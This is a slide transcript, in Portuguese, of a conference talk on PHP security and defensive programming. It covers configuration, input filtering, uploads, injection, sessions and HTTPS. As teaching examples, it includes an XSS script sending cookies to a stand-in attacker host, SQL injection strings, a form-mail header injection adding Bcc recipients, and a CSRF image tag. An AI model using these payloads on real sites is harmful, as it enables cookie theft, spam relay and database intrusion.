PHP no Campo de Batalha: Segurança Avançada e Programação Defensiva - Rafael Jaques [FISL 16]

Transcript

1. PHP no Campo de Batalha Segurança Avançada e Programação Defensiva

   Rafael Jaques @rafajaques

2. “Porque Deus amou o mundo de tal maneira que deu

   o seu Filho Unigênito, para que todo aquele que nele crê não pereça, mas tenha a vida eterna. Portanto, Deus enviou o seu Filho ao mundo não para condenar o mundo, mas para que o mundo fosse salvo por meio dele.” (João 3.16-17)

3. Rafael Jaques Professor do Instituto Federal de Educação, Ciência e

   Tecnologia do Rio Grande do Sul. Graduado em Análise e Desenvolvimento de Sistemas. Pós-graduado em Gestão e Docência do Ensino Superior. Desenvolvedor web e viciado em segurança.

4. www.php-rs.org

5. Slides da Palestra

6. 1 Segurança da informação

7. Pontos-chave da SI Integridade Confidencialidade Disponibilidade

8. COMO VOU DESENVOLVER UMA APLICAÇÃO COM TUDO ISSO?!?!?!?!?!?!

9. Vamos por partes!

10. Tudo começa com planejamento!

11. 2 Planejamento

12. Planejamento Projete o seu sistema Estude antes de implementar Revise

    o que foi feito Conheça o seu ambiente

13. Planejamento Projete o seu sistema Estude antes de implementar Revise

    o que foi feito Conheça o seu ambiente

14. Conheça o seu ambiente

15. php.ini Conheça o seu ambiente phpinfo() php.net/manual/ini.php

16. Conheça o seu ambiente

17. Altere as configurações do php.ini ini_set() httpd.conf .htaccess php.ini Conheça

    o seu ambiente

18. Gerenciamento de erros do PHP display_errors log_errors error_log Conheça o

    seu ambiente

19. Conhecer o sistema inclui saber os problemas do servidor!

20. Problemas no servidor Defesa em profundidade

21. Problemas no servidor Lei do menor privilégio

22. 3 Melhorando o código desenvolvido

23. Como desenvolver um bom código?

24. Tudo começa com BOAS PRÁTICAS

25. Warning: Cannot modify header information - headers already sent by

    (output started at / path/to/script.php:1) in script.php on line 55 Omita as tags de fechamento Boas práticas

26. Utilize extensões consistentes Boas práticas .php .inc.php .inc .php~ .bak

    httpd.conf AddType application/x-httpd-php .php .phtml

27. DRY Don’t repeat yourself Boas práticas

28. == != === Cuidado ao efetuar comparações Boas práticas “1”

    == 1 “1” === 1 true == 1 True False true === 1 NULL == false NULL === false True True False False

29. Nunca edite arquivos em produção Boas práticas

30. Funções perigosas exec( ) Não execute bobagem no seu sistema

    shell_exec( ) system( ) passthru( ) proc_*( ) escapeshellcmd( ) escapeshellarg( )

31. eval( ) Não execute bobagem no seu código Funções perigosas

32. Seu ambiente também precisa de cuidado e atenção

33. Configuração do ambiente Headers Podem denunciar o seu servidor expose_php

    php.ini

34. Apache ServerTokens Prod Major Minor Min Os Full Configuração do

    ambiente

35. Gerenciar os erros pode salvar seu dia!

36. Gerenciamento de erros display_errors error_reporting log_errors error_log Mostrar erros na

    tela Nível de erro mostrado Logar erros Arquivo de log

37. set_error_handler( ) error_log( ) Indica uma função para manipular erros

    Loga um erro personalizado Gerenciamento de erros

38. 4 Filtragem de dados

39. Filtragem de dados Bypass Mistake Origin

40. isset( ) is_array( ) is_bool( ) is_float( ) is_int( )

    is_null( ) is_numeric( ) is_object( ) is_string( ) Filtragem de dados

41. Type Casting Assegure-se dos tipos de dados $numero = (int)

    $variavel; $numero = (float) $variavel; Filtragem de dados

42. Type Casting Assegure-se dos tipos de dados $numero = settype($variavel,

    ‘integer’); $bool = settype($variavel, ‘boolean’); $texto = settype($variavel, ‘string’); Filtragem de dados

43. Type Casting Assegure-se dos tipos de dados $numero = intval($variavel);

    $numero = floatval($variavel); $texto = strval($variavel); Filtragem de dados

44. Validate Sanitize filter_var( ) Validating && Sanitizing Bloqueie valores indesejados

    Filtragem de dados

45. filter_var( ) php.net/filter.filters FILTER_VALIDATE_* FILTER_SANITIZE_* Validação de dados
 Verifica se


    determinado valor encontra-se dentro dos parâmetros esperados. Limpeza de dados Retira de um determinado valor todos os caracteres que
 não são permitidos.

46. Validação filter_var( , ) $valor CONSTANTE_FILTRO Valor filtrado bool(false)

47. Validação FILTER_VALIDATE_INT “7” 7 0 true false int(7) int(7) int(0)

    int(1) bool(false) “10 teste” “palavra” -5 3.1 bool(false) bool(false) int(-5) bool(false) bool(false) +0 || -0

48. Validação FILTER_VALIDATE_EMAIL “[email protected]" string(12) “[email protected]” “[email protected]" bool(false) 5 bool(false) “1@2”

    bool(false) “phpit.com.br” bool(false) “joao quem”@site.com bool(false)

49. Validação FILTER_VALIDATE_FLOAT php.net/filter.filters.validate FILTER_VALIDATE_BOOLEAN FILTER_VALIDATE_IP FILTER_VALIDATE_URL

50. Limpeza FILTER_SANITIZE_URL http://phpit.com.br http://phpit.com.br£ phpitº.com.br br¶ § string(19) "http://phpit.com.br" string(19)

    "http://phpit.com.br" string(12) "phpit.com.br" string(2) "br" string(0) ""

51. FILTER_SANITIZE_STRING uma string string(10) "uma string" string(12) "uma string *"

    string(21) "uma string&lt;tag&gt;" Limpeza <tag>uma string * <tag>uma string&lt;tag&gt;

52. Limpeza FILTER_SANITIZE_EMAIL php.net/filter.filters.validate FILTER_SANITIZE_SPECIAL_CHARS FILTER_SANITIZE_ENCODED FILTER_SANITIZE_NUMBER_INT

53. Cuidados com Formulários

54. Spoofed Form Submissions Cuidados com formulários

55. Spoofed HTTP Requests Cuidados com formulários

56. Abuso de form mail Cuidados com formulários

57. Abuso de form mail <?php $cabecalhos = "From: {$_POST['nome']} <{$_POST['email']}>";

    $para = "[email protected]"; $assunto = "Contato via site"; $corpo = $_POST['mensagem']; mail($para, $assunto, $corpo, $cabecalhos);

58. Abuso de form mail From: Fulaninho <[email protected]> To: [email protected] Subject:

    Contato via site Esta é a mensagem do e-mail Esperado Fulaninho\nBcc: [email protected], [email protected],

59. Abuso de form mail From: Fulaninho Bcc: [email protected], [email protected], <[email protected]>

    To: [email protected] Subject: Contato via site Aqui coloco uma mensagem de SPAM sobre viagra ou algo assim! Possível

60. 5 Upload de arquivos

61. MIME Type do $_FILES Upload de arquivos

62. Algoritmo de Análise de Conteúdo

63. Verificar o tipo da imagem exif_imagetype( ) Upload de arquivos

64. php.net/function.exif-imagetype Upload de arquivos

65. Ressalvar imagens Upload de arquivos

66. Diretivas de upload upload_max_filesize post_max_size Upload de arquivos

67. rafajaques   Palestra  de  PHP exemplo.txt Upload de arquivos

68. Array   (        [arquivo]  =>  Array  

               (                    [name]  =>  exemplo.txt                    [type]  =>  text/plain                    [tmp_name]  =>  /tmp/php3IdMTx                    [error]  =>  0                    [size]  =>  33              )   ) Upload de arquivos

69. POST  /upload.php  HTTP/1.1   Host:  localhost   Content-­‐Type:  multipart/form-­‐data;  boundary=-­‐-­‐-­‐-­‐12345

      Content-­‐Length:  413   -­‐-­‐-­‐-­‐12345   Content-­‐Disposition:  form-­‐data;  name="arquivo";   filename="exemplo.txt"   Content-­‐Type:  text/plain   rafajaques   Palestra  de  PHP   -­‐-­‐-­‐-­‐12345-­‐-­‐ Upload de arquivos

70. Movendo arquivos enviados is_uploaded_file( ) move_uploaded_file( ) Upload de arquivos

71. 6 Injeção de código

72. XSS Cross-Site Scripting

73. XSS Cross-Site Scripting <script> document.location = "http://sitedomal.com?c=" + document.cookie </script>

74. XSS Cross-Site Scripting Filtrar dados externos Utilize as funções de

    filtro Utilize uma white-list

75. htmlentities( ) strip_tags( ) XSS Cross-Site Scripting Utilize as funções

    de filtro utf8_decode( ) filter_var( )

76. XSS Cross-Site Scripting Cuidado com injeção de CSS expression( )

    url( ) Métodos
 específicos moz- binding

77. CSRF Cross-Site Request Forgery

78. CSRF Cross-Site Request Forgery http://meusite.com/voto.php?id=1 <img src="http://meusite.com/voto.php?id=1" />

79. CSRF Cross-Site Request Forgery Exigir um token Solicitar reautenticação Prefira

    POST em vez de GET Limite o tempo de sessão Verificar Referer Force o uso de seus formulários uniqid( ) $_SERVER['HTTP_REFERER']

80. Outros tipos de injeção XPath LDAP Bibliotecas de terceiros Upload

    de arquivos

81. Indo além da Validação de dados

82. Além da validação Regras de negócio Filtrou a entrada? Filtre

    a saída! Não confie nos cookies!

83. 7 Segurança em bancos de dados

84. SGBDs suportados pelo PHP php.net/refs.database dBase DB++ CUBRID FrontBase FireBird/Interbase

    filePro Ingres Informix IBM DB2 mSQL Mongo MaxDB Oracle MySQL M$ SQL PostgreSQL Paradox Ovrimos SQL Tokyo Tyrant Sybase SQLite

85. Conceitos básicos de segurança em Bancos de Dados

86. Lei do Menor Privilégio

87. Não permita Acesso Remoto

88. Prefira utilizar UTF-8

89. Escapar caracteres não é seguro mysql_real_escape_string( ) addslashes( )

90. SQL e Blind SQL Injection

91. SQL Injection

92. SQL Injection Injeção de código SQL arbitrário dentro de uma

    consulta legítima.

93. SQL Injection

94. SQL Injection 1' OR 1='1

95. SQL Injection fulano'# ou fulano' --

96. SQL Injection Blind

97. Injeção de código arbitrário sem visualização da saída do banco.

    Blind SQL Injection

98. sqlmap

99. None

100. Prepared Statements e ORMs

101. Prepared Statements Declarações preparadas Compila as consultas SQL Utiliza placeholders

102. Declarações preparadas INSERT INTO produtos (nome, preco) VALUES (?, ?)

     Prepared Statements

103. ORM Object-relational mapping Reduz a escrita de SQL Acesso ao

     banco através de classes

104. ORMs

105. Exposição de credenciais

106. O que acontece se alguém tiver acesso aos seus arquivos?

107. E se o PHP parar de funcionar?

108. E se houver um include mal programado?

109. 8 Cookies e sessions

110. Cookies são client-side Sessions são server-side Cookies e Sessions

111. Cliente Servidor Requisição HTTP Resposta HTTP + Set Cookie Requisição

     HTTP Resposta HTTP Cookies e Sessions

112. Servidor session_start() Verifica se a sessão existe Procura pelo SESSID

     em um cookie Procura pelo SESSID numa querystring Busca os dados e cria a $_SESSION Sim Sim Não Cria uma nova SESSID Não Cookies e Sessions

113. Roubo de Cookie (Cookie Theft)

114. Não costumam existir vulnerabilidades de navegador para roubo de cookies

115. Tome cuidado com XSS

116. None
117. None

118. Cookies também podem ser roubados com sniffers Proteja utilizando HTTPS

119. Vulnerabilidades de Sessão

120. Exposição de Sessão Dados de sessão podem ser visualizados via

     sniff quando não criptografado com HTTPS

121. Hospedagens compartilhadas podem vazar dados dentro dos diretórios com permissões

     de leitura a todos Utilize session_set_save_handler() para alterar o comportamento de gravação dos dados de sessão Exposição de Sessão

122. Não é o roubo de um ID de sessão. É

     a imposição de um! Fixação de Sessão

123. Não permita que sejam utilizados SID não gerados pela aplicação

     Fixação de Sessão

124. Gere um novo SID em cada requisição Utilize session_regenerate_id() Páginas

     com muito tráfego acabam gerando SID inválidos Fixação de Sessão

125. Roubo de Sessão (Session Hijacking)

126. Roubo de Sessão É possível fixar um SID, forjar ou

     até mesmo capturar um cookie!

127. Algumas sugestões para evitar roubo de sessão (tente equilibrar usabilidade

     e segurança): Gerar tokens únicos por usuário Verificar User-Agent e IP Utilizar sessões apenas via cookies Roubo de Sessão

128. Não sacrifique a usabilidade do projeto!

129. None

130. não

131. Boas práticas

132. Nunca utilize cookies para autenticação Prefira cookies para informações não-vitais

133. Utilize sessões sempre em conjunto com cookies Ajuda a prevenir

     o roubo de sessão

134. pagina.php?PHPSESSID=1234

135. php.ini session.use_cookies session.use_only_cookies GET / HTTP/1.1 Host: algumsite.com User-Agent: Mozilla/5.0

     Accept: image/png,image/*;q=0.8,*/*;q=0.5 Cookie: PHPSESSID=3108c6a684a89787947087d4e46f278d Cache-Control: max-age=0

136. Cuidado com hospedagem compartilhada ou dois sites no mesmo servidor

     Pode ocorrer choque de sessão
137. None

138. Utilize session_destroy() e não apenas remova o cookie Um cookie

     roubado pode reinicializar uma sessão

139. Destrua a sessão antes de alterar o nível de permissão

     de usuário autenticado Impede que uma sessão de guest seja utilizada para um usuário autenticado

140. 9 Tráfego na web

141. Fluxo do tráfego Cliente Servidor Requisição HTTP Resposta HTTP Requisição

     HTTP Resposta HTTP

142. Sniffers em redes abertas

143. Wireshark

144. None

145. Configurando um certificado SSL

146. http://www.phpit.com.br/artigos/configurando-ssl- servidor-de-desenvolvimento-apache.phpit Gerando um certificado para testes

147. Alternando entre HTTP e HTTPS

148. Leves diferenças na $_SERVER sob HTTPS

149. $_SERVER [HTTP_HOST] => localhost [SERVER_SOFTWARE] => Apache/2.2.22 [SERVER_NAME] => localhost

     [SERVER_ADDR] => 127.0.0.1 [SERVER_PORT] => 80 [REMOTE_ADDR] => 127.0.0.1 [DOCUMENT_ROOT] => /var/www HTTP [HTTPS] => on [SSL_TLS_SNI] => localhost [HTTP_HOST] => localhost [SERVER_SOFTWARE] => Apache/2.2.22 [SERVER_NAME] => localhost [SERVER_ADDR] => 127.0.0.1 [SERVER_PORT] => 443 [REMOTE_ADDR] => 127.0.0.1 [DOCUMENT_ROOT] => /var/www HTTPS

150. Force a utilização do protocolo HTTPS Via aplicação ou via

     apache

151. Monitorar logs Manter PHP atualizado Frameworks Segurança física Últimas dicas

152. Sempre que possível, utilize código refatorado Exposição phpinfo() Cuidados ao

     enviar e-mails Segurança no sistema de arquivos Últimas dicas

153. Obrigado! Rafael Jaques [email protected] phpit.com.br @rafajaques slideshare.net/rafajaques youtube.com/realphpit w @

154. Imagens utilizadas • https://flic.kr/p/5Ndwd8 • https://flic.kr/p/i3NEP6